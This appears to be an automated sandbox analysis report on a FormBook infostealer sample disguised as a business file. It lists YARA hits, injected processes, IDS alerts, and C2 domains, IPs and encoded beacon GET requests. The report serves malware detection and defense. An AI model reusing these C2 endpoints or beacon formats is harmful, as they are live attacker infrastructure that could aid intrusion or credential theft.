Windows Analysis Report
2024 Lusail Fence-WITH STICKER-2-003.exe

AI detected suspicious sample

Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Joe Sandbox ML: detected

Source: 2024 Lusail Fence-WITH STICKER-2-003.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364522933.0000000004330000.00000004.00001000.00020000.00000000.sdmp, 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364960742.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1367439868.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365074294.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.1417912394.00000000040DF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000003.1421634030.000000000428E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.0000000004440000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000002.1421885030.0000000005310000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1417263305.000000000301B000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000004.00000002.3808912482.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364522933.0000000004330000.00000004.00001000.00020000.00000000.sdmp, 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000003.1364960742.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1367439868.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1365074294.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1418417449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000004.00000003.1417912394.00000000040DF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000003.1421634030.000000000428E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.00000000045DE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.3809219017.0000000004440000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000002.1421885030.0000000005310000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1417263305.000000000301B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3808912482.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3823187633.0000000010F0F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3808555640.000000000070B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.000000000498F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3823187633.0000000010F0F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.3808555640.000000000070B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.3810060905.000000000498F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DE4696
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DEC9C7
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEC93C FindFirstFileW,FindClose,	0_2_00DEC93C
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DEF200
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DEF35D
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DEF65E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DE3A2B
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DE3D4E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DEBF27

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop esi	2_2_00417295
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop esi	2_2_0041730F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop ebx	2_2_00407B1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	2_2_0040E43A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	2_2_00416CDB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	4_2_001B7295
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	4_2_001B730F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	4_2_001AE43A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx	4_2_001A7B1B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	4_2_001B6CDB

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49704 -> 52.86.6.113:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49705 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49708 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49709 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49710 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49711 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49712 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49713 -> 185.53.179.91:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49714 -> 198.185.159.144:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49715 -> 104.194.9.178:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.86.6.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.gb-electric-wheelchairs-8j.bond/ts59/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.babyscan.xyz

Source: global traffic	HTTP traffic detected: GET /ts59/?7n=6XBHEvjpc5M3V6LIfIX8DkkGcsaew2r6P99WVPRIfudOyKrWJ/Ql+0StQIWY9mDv/yxfQ54Ieg==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.cn-brand.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=mlngg5Tq8mAbovLDpSTQPdURm3XRXD2izxcBP0x82yVhlreLb+x9gDDmRHWXZVcg0gqB6qNybQ==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.asmauardotreschicshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=axrGY/tHsVnNl5QwUQiA9FSVXiVl+cKu3zfjN+PR7I9fZgnn7wX4yTtY89Vmc3+NwxjOyoKz1w==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.femininequantumflowcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.zangbreaker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhppaUL+BqZnD0gHwuuw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.babyscan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.scarytube.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=cK9IFJet6pmJE86ae8KOHfirNs8pECX6NYxzkQ3MXT6vCvPIzrd8O4FQURVhV/WvD5THDom2OA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.robottts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.gb-electric-wheelchairs-8j.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.lostaino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 52.86.6.113 52.86.6.113
Source: Joe Sandbox View	IP Address: 52.86.6.113 52.86.6.113
Source: Joe Sandbox View	IP Address: 192.0.78.25 192.0.78.25

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: SQUARESPACEUS SQUARESPACEUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00DF25E2

Source: global traffic	HTTP traffic detected: GET /ts59/?7n=6XBHEvjpc5M3V6LIfIX8DkkGcsaew2r6P99WVPRIfudOyKrWJ/Ql+0StQIWY9mDv/yxfQ54Ieg==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.cn-brand.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=mlngg5Tq8mAbovLDpSTQPdURm3XRXD2izxcBP0x82yVhlreLb+x9gDDmRHWXZVcg0gqB6qNybQ==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.asmauardotreschicshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=axrGY/tHsVnNl5QwUQiA9FSVXiVl+cKu3zfjN+PR7I9fZgnn7wX4yTtY89Vmc3+NwxjOyoKz1w==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.femininequantumflowcoach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=/870L+f5uYuMeX+RQ7xUOiQTdWqbXz9Ki2XQMm/qjwY6yFcouCApqHiIgf95TupcdCgvNrXz6Q==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.zangbreaker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhppaUL+BqZnD0gHwuuw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.babyscan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=5Kzuc08NHZ8t10osRye94ZQvODLPm8mJty646c/dpAg/zLZpW1bo0yg/pue6LIfdumZDuAZHWw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.scarytube.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=cK9IFJet6pmJE86ae8KOHfirNs8pECX6NYxzkQ3MXT6vCvPIzrd8O4FQURVhV/WvD5THDom2OA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.robottts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVo2JmSZYGQcG7mEBYw==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.gb-electric-wheelchairs-8j.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ts59/?7n=CMI3XAkyIIc+lbzQFM0yBiMxIQj45W/6BGDFfPoe8SD5h+4DN1QfAHIl1f4AVZ60VX6NCS7/mA==&2d8=3fe8kxnx8zVX-2L HTTP/1.1Host: www.lostaino.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: www.cn-brand.com
Source: global traffic	DNS traffic detected: DNS query: www.asmauardotreschicshoes.com
Source: global traffic	DNS traffic detected: DNS query: www.femininequantumflowcoach.com
Source: global traffic	DNS traffic detected: DNS query: www.wizardatm.com
Source: global traffic	DNS traffic detected: DNS query: www.zangbreaker.com
Source: global traffic	DNS traffic detected: DNS query: www.babyscan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.scarytube.world
Source: global traffic	DNS traffic detected: DNS query: www.robottts.com
Source: global traffic	DNS traffic detected: DNS query: www.gb-electric-wheelchairs-8j.bond
Source: global traffic	DNS traffic detected: DNS query: www.lostaino.com
Source: global traffic	DNS traffic detected: DNS query: www.modleavedepts.online

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Jul 2024 13:29:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 01 Jul 2024 13:29:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HtJyd%2Bvz2%2F3a0dF9fXmG6o9he9firTEuMYsDco1AoWWycrEkIXplX47vWYl43fhfRrcZco4ffTEQRvbkk9QywI5EJytBkul4RumcI14FWQDYKiFWXIYzHdUmXPtRIfy7o96tan3DNtmCyFgSZL0hg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=7.999897X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 89c6becfcb3e43ac-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 Data Ascii: <!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Attention Required! | Cloud

Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3813475004.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3813475004.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3813475004.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000000.1377287114.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3813475004.000000000730B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3074348658.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2273284705.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272115538.0000000008F83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3816237958.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.3815542294.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3814662629.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1376904113.0000000008810000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.asmauardotreschicshoes.com
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.asmauardotreschicshoes.com/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.asmauardotreschicshoes.com/ts59/www.texhio.online
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.asmauardotreschicshoes.comReferer:
Source: explorer.exe, 00000003.00000000.1379885909.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.babyscan.xyz
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.babyscan.xyz/ts59/
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.babyscan.xyz/ts59/www.scarytube.world
Source: explorer.exe, 00000003.00000002.3821675015.000000000C43F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272081328.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073937500.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.babyscan.xyzReferer:
